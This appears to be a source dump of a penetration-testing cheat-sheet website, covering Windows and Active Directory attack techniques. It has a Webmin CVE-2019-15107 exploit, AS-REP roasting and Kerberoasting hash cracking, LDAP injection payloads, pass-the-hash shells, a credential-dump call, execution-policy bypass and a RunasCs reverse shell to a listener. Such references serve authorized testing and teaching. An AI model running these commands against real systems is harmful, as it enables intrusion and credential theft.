18 | 19 | ## password_change.cgi Command Injection (Backdoored Release, version 1.890) 20 | 21 | The 1.890 release shipped with a backdoor in `password_change.cgi` (tracked as CVE-2019-15107); the Metasploit module below targets it. Replace `TARGET_IP` and `LOCAL_IP` with the Webmin host and your listener address. 22 | 23 | ```sh 24 | msfconsole 25 | msf> use exploit/linux/http/webmin_backdoor 26 | msf> set rhosts TARGET_IP 27 | msf> set lhost LOCAL_IP 28 | msf> run 29 | shell 30 | ``` 31 | 32 | 
31 | 32 | ## Remote Code Execution (RCE) in password_change.cgi (CVE-2019-15107, versions 1.882 to 1.921) 33 | 34 | Webmin 1.882 through 1.921 are vulnerable to unauthenticated remote command execution in `password_change.cgi` (CVE-2019-15107). Version 1.890 is exploitable in its default configuration; the other affected versions are exploitable only when changing of expired passwords is enabled. 35 | Clone the public PoC below and pass the target host as described in the repository's README. 36 | 37 | ```sh 38 | git clone https://github.com/MuirlandOracle/CVE-2019-15107 39 | cd CVE-2019-15107 40 | python3 CVE-2019-15107.py 41 | ``` 42 | -------------------------------------------------------------------------------- /src/exploit/windows/_data.yml: -------------------------------------------------------------------------------- 1 | category1: windows 2 | related_menus: 3 | - title: Active Directory 4 | id: active-directory 5 | - title: Protocol 6 | id: protocol 7 | - title: Service 8 | id: service 9 | - title: Privilege Escalation 10 | id: privilege-escalation 11 | - title: Post Exploitation 12 | id: post-exploitation 13 | - title: Forensics 14 | id: forensics 15 | - title: PowerShell 16 | id: powershell 17 | - title: WSL 18 | id: wsl 19 | - title: Technique 20 | id: technique -------------------------------------------------------------------------------- /src/exploit/windows/active-directory/_data.yml: -------------------------------------------------------------------------------- 1 | category2: active-directory -------------------------------------------------------------------------------- /src/exploit/windows/active-directory/as-rep-roasting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: AS-REP Roasting 3 | description: AS-REP Roasting is a technique that requests AS-REP messages for Active Directory accounts that do not require Kerberos pre-authentication and recovers offline-crackable password hashes from them. 4 | tags: 5 | - Active Directory 6 | - Windows 7 | refs: 8 | date: 2025-04-19 9 | draft: false 10 | --- 11 | 12 | ## Exploit 13 | 14 | List the accounts that do not require Kerberos pre-authentication and request their AS-REP hashes (`DC_IP` is the domain controller's IP address). 
15 | 16 | ```sh 17 | impacket-GetNPUsers example.local/ 18 | impacket-GetNPUsers -dc-ip DC_IP example.local/ -no-pass -usersfile users.txt 19 | impacket-GetNPUsers -dc-ip DC_IP example.local/ -no-pass -format hashcat 20 | 21 | # Without authentication 22 | netexec ldap DC_IP -u users.txt -p '' --asreproast output.txt 23 | # With authentication 24 | netexec ldap DC_IP -u username -p password --asreproast output.txt 25 | # With Kerberos authentication (-k) 26 | netexec ldap DC_IP -k --asreproast output.txt 27 | ``` 28 | 29 | If we find a password hash, crack it. 30 | 31 | ```sh 32 | john --format=krb5asrep --wordlist=wordlist.txt hash.txt 33 | # or 34 | hashcat -m 18200 -a 0 hash.txt wordlist.txt 35 | ``` 36 | 37 | -------------------------------------------------------------------------------- /src/exploit/windows/active-directory/ldap-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LDAP Injection 3 | description: LDAP may be vulnerable to query injection if the website does not properly validate user input. 4 | tags: 5 | - Active Directory 6 | - Web 7 | - Windows 8 | refs: 9 | - https://infosecwriteups.com/for-newbies-simple-examples-of-ldap-injection-vulnerabilities-cbf231431923 10 | date: 2023-09-22 11 | draft: false 12 | --- 13 | 14 | ## Basic Payloads 15 | 16 | ```bash 17 | (&uid=*)(userPassword=*) 18 | (&uid=*)|(userPassword=*) 19 | (&uid=*)|(objectClass=*)(userPassword=password123) 20 | 21 | *)(uid=*))(|(password=*) 22 | ``` 23 | -------------------------------------------------------------------------------- /src/exploit/windows/active-directory/netlogon-elevasion.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Netlogon Elevation 3 | description: A privilege escalation vulnerability in Windows Netlogon, reachable over the Netlogon Remote Protocol (MS-NRPC), that lets an unauthenticated attacker set an empty password on the domain controller's machine account. It’s called Zerologon (CVE-2020-1472). 
4 | tags: 5 | - Active Directory 6 | - Windows 7 | refs: 8 | date: 2025-04-19 9 | draft: false 10 | --- 11 | 12 | ## Exploitation 13 | 14 | Many PoCs are available online. 15 | Here, we’ll use [this repository](https://github.com/dirkjanm/CVE-2020-1472) from GitHub. 16 | 17 | **Caution:** the exploit works by resetting the domain controller's machine account password to an empty string, which breaks the DC's trust relationship with the domain (replication and other DC-to-DC operations fail). On a real engagement, dump the original machine account password (e.g. with secretsdump) and restore it immediately afterwards; the repository ships a `restorepassword.py` for this. -------------------------------------------------------------------------------- /src/exploit/windows/dotnet/_data.yml: -------------------------------------------------------------------------------- 1 | category2: dotnet -------------------------------------------------------------------------------- /src/exploit/windows/dotnet/index.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: .NET 3 | description: .NET is an application development environment. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2024-07-17 8 | draft: false 9 | --- 10 | 11 | ## Create a .NET Project from Command Line 12 | 13 | ```bash 14 | # Create a new solution file 15 | # -n: The name for the output being created 16 | dotnet new sln -n test 17 | 18 | # Create a new .NET project. 19 | # console: Use a template for creating a console application. 20 | dotnet new console -n test 21 | 22 | # Add the project to a solution file. 
23 | dotnet sln add test/test.csproj 24 | ``` 25 | 26 | ### Build/Run 27 | 28 | To build and run the project, run the following command in the project directory: 29 | 30 | ```csharp 31 | dotnet build 32 | dotnet run 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/windows/forensics/_data.yml: -------------------------------------------------------------------------------- 1 | category2: forensics -------------------------------------------------------------------------------- /src/exploit/windows/forensics/reading-onedrive-logs.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reading OneDrive Logs 3 | description: OneDrive log files can be read by deobfuscating. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2023-08-18 8 | draft: false 9 | --- 10 | 11 | ## Deobfuscating Log Files 12 | 13 | To read OneDrive logs, we need to deobfuscate log files (**`.odl`, `.odlsent`, `.odlgz`**). 14 | These logs are located in the following on **Windows**: 15 | 16 | - `C:\Users\\AppData\Local\Microsoft\OneDrive\logs\Personal\` 17 | - `C:\Users\\AppData\Local\Microsoft\OneDrive\logs\Business1\` 18 | 19 | [This repository](https://github.com/ydkhatri/OneDrive) is useful to deobfuscate OneDrive logs. 20 | 21 | ```bash 22 | python -m venv venv 23 | # on Windows 24 | .\venv\Scripts\activate 25 | pip install construct pycryptodome 26 | python odl.py -o .\output.csv c:\Users\\AppData\Local\Microsoft\OneDrive\logs\Personal\ 27 | ``` 28 | 29 | After that, we can read the output file (`output.csv`) with tools such as VS Code and Excel. 30 | This file contains sensitive information such as OneDrive account email, access token, etc. 
-------------------------------------------------------------------------------- /src/exploit/windows/forensics/windows-xml-eventLog.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Windows XML EventLog (EVTX) 3 | description: EVTX is used for Microsoft Windows to store system log information. 4 | tags: 5 | - Forensics 6 | - Windows 7 | refs: 8 | date: 2023-03-26 9 | draft: false 10 | --- 11 | 12 | ## Read EVTX in Linux 13 | 14 | We can parse **`.evtx`** file in Linux using [evtx_dump](https://github.com/omerbenamram/evtx). 15 | 16 | ```bash 17 | wget https://github.com/omerbenamram/evtx/releases/download/v0.8.1/evtx_dump-v0.8.1-x86_64-unknown-linux-gnu -O evtx_dump 18 | chmod +x evtx_dump 19 | ./evtx_dump example.evtx > parsed.txt 20 | ``` 21 | 22 | Now we can find sensitive information from the parsed text. 23 | 24 | ```bash 25 | grep -i TargetUserName parsed.txt 26 | grep -i TargetDomainName parsed.txt 27 | ``` 28 | 29 |
30 | 31 | ## Search Suspicious Activity in EVTX 32 | 33 | [Chainsaw](https://github.com/WithSecureLabs/chainsaw) is a command-line tool to rapidly search and hunt through Windows Forensics Artifacts. 34 | 35 | ```bash 36 | git clone https://github.com/WithSecureLabs/chainsaw.git 37 | cd chainsaw 38 | cargo build --release 39 | ./chainsaw hunt evtx_files/ -s sigma/rules --mapping mapping/sigma-event-logs-all.yml 40 | ``` 41 | -------------------------------------------------------------------------------- /src/exploit/windows/post-exploitation/_data.yml: -------------------------------------------------------------------------------- 1 | caterogy2: post-exploitation -------------------------------------------------------------------------------- /src/exploit/windows/post-exploitation/window-pivoting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Windows Pivoting 3 | description: Accessing obtained over one machine to exploit another machine deeper in the network. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Enumerate Network 12 | 13 | After entering the target server, enumerate and search other networks. 14 | 15 | ### Check the ARP Cache in Target Machine 16 | 17 | ```sh 18 | arp.exe -a 19 | ``` 20 | 21 | ### Check IP Addresses 22 | 23 | ```sh 24 | Get-Content c:\Windows\System32\drivers\etc\hosts 25 | ipconfig /all 26 | ``` 27 | 28 | ### Search Other Network Ranges 29 | 30 | No content yet. 
-------------------------------------------------------------------------------- /src/exploit/windows/powershell/_data.yml: -------------------------------------------------------------------------------- 1 | category2: powershell -------------------------------------------------------------------------------- /src/exploit/windows/powershell/powershell-executionpolicy-bypass.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PowerShell ExecutionPolicy Bypass 3 | description: 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2024-08-28 8 | draft: false 9 | --- 10 | 11 | ## Method 1. Set-ExecutionPolicy 12 | 13 | By default, the ExecutionPolicy is set to `Restricted` on Windows client editions (Windows Server defaults to `RemoteSigned`). 14 | 15 | ```bash 16 | Get-ExecutionPolicy 17 | # Restricted 18 | ``` 19 | 20 | To bypass the restriction, run one of the following commands. Without `-Scope`, `Set-ExecutionPolicy` changes the LocalMachine policy and needs an elevated (**Administrator**) prompt; with `-Scope CurrentUser` or `-Scope Process` no elevation is required. Note that the execution policy is a safety feature against accidentally running scripts, not a security boundary. 21 | 22 | ```bash 23 | Set-ExecutionPolicy Unrestricted 24 | Set-ExecutionPolicy Bypass 25 | # No elevation needed: 26 | Set-ExecutionPolicy -Scope CurrentUser Bypass 27 | ``` 28 | 29 | 
28 | 29 | ## Method 2. Run with `-ExecutionPolicy Bypass` 30 | 31 | This needs no Administrator rights and only applies to that PowerShell process. 32 | 33 | ```bash 34 | powershell -noexit -ExecutionPolicy Bypass -File example.ps1 35 | ``` 36 | -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: privilege-escalation -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/activate-administrator-account-on-windows.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Activate Administrator Account on Windows 3 | description: 4 | tags: 5 | - Privilege Escalation 6 | - Windows 7 | refs: 8 | date: 2024-04-01 9 | draft: false 10 | --- 11 | 12 | Open PowerShell as **Administrator**. 13 | 14 | ```powershell 15 | net user administrator /active:yes 16 | ``` 17 | 18 | Now you can sign in to the Administrator account. 19 | 20 | After that, you should disable the Administrator account again as below: 21 | 22 | ```powershell 23 | net user administrator /active:no 24 | ``` -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/dumping-credentials-with-keymgr-dll.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Dumping Credentials with keymgr.dll 3 | description: Calling KRShowKeyMgr in keymgr.dll opens the "Stored User Names and Passwords" dialog, which lists the credentials saved in Credential Manager for the current user and can back them up to a .crd file. 
4 | tags: 5 | - Privilege Escalation 6 | - Windows 7 | refs: 8 | - https://samples.vx-underground.org/Papers/Windows/Data%20Theft/2022-04-19%20-%20Dumping%20passwords%20using%20KRShowKeyMgr.PNG 9 | date: 2024-05-17 10 | draft: false 11 | --- 12 | 13 | ## Dump 14 | 15 | ```sh 16 | rundll32 keymgr.dll, KRShowKeyMgr 17 | ``` 18 | 19 | This opens a GUI dialog, so it requires an interactive desktop session (it will not work from a plain remote shell). The dialog's **Back up** button exports the stored credentials to a password-protected `.crd` file. -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/login-windows-shell.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Login Windows Shell 3 | description: If we have credentials for the target Windows system, we can execute commands from a Linux machine. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2023-11-11 8 | draft: false 9 | --- 10 | 11 | ## Impacket PsExec 12 | 13 | PsExec gives us an interactive shell on the Windows host. It works by uploading a service binary to the `ADMIN$` share and creating a service, so it is noisy (service-creation events) and needs local administrator rights; prefer WmiExec below when stealth matters. 14 | 15 | ```sh 16 | impacket-psexec username:password@10.0.0.1 17 | # Pass the Hash (-hashes LMHASH:NTHASH) 18 | impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1 19 | ``` 20 | 21 | 
22 | 23 | ## Impacket WmiExec 24 | 25 | WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host. 26 | 27 | ```sh 28 | impacket-wmiexec example.local/username@10.0.0.1 29 | # Pass the Hash (-hashes LMHASH:NTHASH) 30 | impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/spn-jacking.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SPN-Jacking 3 | description: If the current user has the right to write the SPN of another user (targeted Kerberoasting), we can achieve lateral movement or privilege escalation. 4 | tags: 5 | - Active Directory 6 | - Privilege Escalation 7 | - Windows 8 | refs: 9 | - https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking 10 | date: 2024-10-13 11 | draft: false 12 | --- 13 | 14 | ## Exploit 15 | 16 | ### 1. Set SPN and Get the Hash of the Service Ticket 17 | 18 | Replace `TARGET_USER` with the account whose `servicePrincipalName` attribute you can write. 19 | 20 | ```bash 21 | # 1. Import PowerView module 22 | . .\PowerView.ps1 23 | 24 | # 2. Set SPN (SPNs must be unique in the forest, so pick a value nobody else uses) 25 | Set-DomainObject -Identity TARGET_USER -Set @{serviceprincipalname='evil/evil'} 26 | 27 | # 3. Request service ticket 28 | Get-DomainSPNTicket -SPN evil/evil 29 | 30 | # 4. Clean up afterwards: remove the SPN you added 31 | Set-DomainObject -Identity TARGET_USER -Clear serviceprincipalname 32 | ``` 33 | 34 | ### 2. Crack the Hash 35 | 36 | After that, we retrieve the hash of the ticket, so crack it on your local machine: 37 | 38 | ```bash 39 | # -m 13100: Kerberos 5 TGS-REP etype 23 (RC4). Use 19600 (etype 17, AES128) or 19700 (etype 18, AES256) if the ticket is AES-encrypted. 
35 | hashcat -a 0 -m 13100 hash.txt wordlist.txt 36 | ``` 37 | -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/switch-user-on-windows.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Switch User on Windows 3 | description: 4 | tags: 5 | - Privilege Escalation 6 | - Windows 7 | refs: 8 | date: 2024-04-01 9 | draft: false 10 | --- 11 | 12 | ## Runas 13 | 14 | `runas` prompts for the password interactively (it cannot be passed on the command line), so it only works from an interactive session. From a non-interactive shell (reverse shell, WinRM), use RunasCs below instead. 15 | 16 | ```bash 17 | runas /user:USERNAME cmd 18 | runas /user:DOMAIN\USERNAME cmd 19 | ``` 20 | 21 | 
20 | 21 | ## RunasCS 22 | 23 | We can spawn another shell as another user with [RunasCS](https://github.com/antonioCoco/RunasCs). 24 | First, start a listener on the local machine. 25 | 26 | ```bash 27 | nc -lvnp 4444 28 | ``` 29 | 30 | Then execute the following command on the target machine. 31 | Replace `USERNAME` and `PASSWORD` with the target user's credentials and `10.0.0.1:4444` with your local IP and port. 32 | 33 | ```powershell 34 | RunasCs.exe USERNAME PASSWORD cmd -r 10.0.0.1:4444 35 | ``` 36 | -------------------------------------------------------------------------------- /src/exploit/windows/protocol/_data.yml: -------------------------------------------------------------------------------- 1 | category2: protocol -------------------------------------------------------------------------------- /src/exploit/windows/service/_data.yml: -------------------------------------------------------------------------------- 1 | category2: service -------------------------------------------------------------------------------- /src/exploit/windows/service/m365-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: M365 (Microsoft Office 365) Pentesting 3 | description: 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2023-09-09 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ### Password Spraying 14 | 15 | We may spray user passwords with the open-source tools below. Password spraying against M365 can lock accounts out and triggers sign-in risk detections, so use a slow cadence (one password per user per lockout window) and stay within the engagement's rules. 
16 | 17 | - [MFASweap](https://github.com/dafthack/MFASweep) 18 | - [o365spray](https://github.com/0xZDH/o365spray) 19 | -------------------------------------------------------------------------------- /src/exploit/windows/technique/_data.yml: -------------------------------------------------------------------------------- 1 | category2: technique -------------------------------------------------------------------------------- /src/exploit/windows/technique/download-files-in-windows.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Download Files in Windows 3 | description: We can download files from websites in Windows from command line. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2024-09-14 8 | draft: false 9 | --- 10 | 11 | ### PowerShell 12 | 13 | ```powershell 14 | wget https://example.com/hello.txt -o hello.txt 15 | # or 16 | Invoke-WebRequest -Uri https://example.com/hello.txt -Outfile .\hello.txt 17 | # or 18 | IWR -Uri https://example.com/hello.txt -Outfile .\hello.txt 19 | ``` 20 | 21 | ### Command Prompt 22 | 23 | We need to call `powershell` or `powershell.exe` command before actual command. 24 | 25 | ```powershell 26 | powershell wget https://example.com/hello.txt -o hello.txt 27 | # or 28 | powershell Invoke-WebRequest -Uri https://example.com/hello.txt -Outfile .\hello.txt 29 | # or 30 | powershell IWR -Uri https://example.com/hello.txt -Outfile .\hello.txt 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/windows/wsl/_data.yml: -------------------------------------------------------------------------------- 1 | category2: wsl -------------------------------------------------------------------------------- /src/support.vto: -------------------------------------------------------------------------------- 1 | --- 2 | layout: layouts/base.vto 3 | bodyClass: body-support 4 | --- 5 | 6 |
7 |
8 | {{ comp.support() }} 9 |
10 |
--------------------------------------------------------------------------------